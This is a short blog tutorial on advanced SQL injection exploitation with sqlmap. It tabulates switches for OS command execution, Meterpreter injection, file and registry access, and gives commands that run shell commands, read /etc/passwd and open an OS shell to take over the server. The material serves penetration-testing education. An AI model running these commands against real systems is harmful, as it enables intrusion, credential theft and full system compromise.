We have learnt the basic exploitation of Sql Injection with the help of Sqlmap in our previous posts. But there is always a step further. In this post we will see most advanced exploitation with Sqlmap.
Once again 3 cheers to Kunal for helping me out for this post.
In our first post of Sqlmap, we have explained few basic options of Sqlmap. We will see some more.
Advanced Exploitation with Sqlmap
Whenever I meet people and talk about any vulnerability, my first and final ask remains the same what is most extreme thing we can do by exploiting that vulnerability. In the case of SQL Injection most of my peers don’t discuss beyond downloading or altering the database. Although we can go beyond it and take the control of the application completely with the help of shell. we can run the os-commands, upload a file, read an existing file and what not.
Advanced Options of Sqlmap
Operating System Level Access:
| Switch | Details |
| –os-cmd=OSCMD | Run operating system level commands |
| –os-shell | Invoke an interactive shell for communication |
| –os-pwn | Injecting a Meterpreter shell or VNC |
| –os-smbrelay | One click prompt for an OOB shell, meterpreter or VNC |
| –os-bof | Stored procedure buffer overflow exploitation |
| –priv-esc | Database process’ user privilege escalation |
| –msf-path=MSFPATH | Local path where Metasploit Framework 3 is installed |
File System Level Access:
There are options used to access the underlying file system of the database server.
| Switch | Details |
| –file-read=RFILE | Read a file from the back-end DBMS file system |
| –file-write=WFILE | Write a local file on the back-end DBMS file system |
| –file-dest=DFILE | Back-end DBMS absolute filepath to write to |
Windows Registry Access:
| Switch | Details |
| –reg-read | Read a Windows registry key value |
| –reg-add | Write a Windows registry key value data |
| –reg-del | Delete a Windows registry key value |
| –reg-key=REGKEY | Windows registry key |
| –reg-value=REGVAL | Windows registry key value |
| –reg-data=REGDATA | Windows registry key value data |
| –reg-type=REGTYPE | Windows registry key value type |
We will see the practical implementation of few of the above ones. Lets start with running the below commands.
sqlmap -r sql.txt -p item --os-cmd=ls
sqlmap -r sql.txt -p item --os-cmd=ifconfig
Let’s see if we can read any file on the server.
sqlmap -r sql.txt -p item --read-file=/etc/passwd
We will read the files now.
This looks great ! What next, may be the shell.
sqlmap -r sql.txt -p item --os-shell
So You own the machine now. If you remember we have discussed regarding keeping the hash value for further attacks. Lets try that as well. As you can see you have got the crack of the hashes.
So, In this Sqlmap series we have learnt regarding basic exploit to advanced system takeover.
Do drop your valuable suggestions and feedback.
great explanation!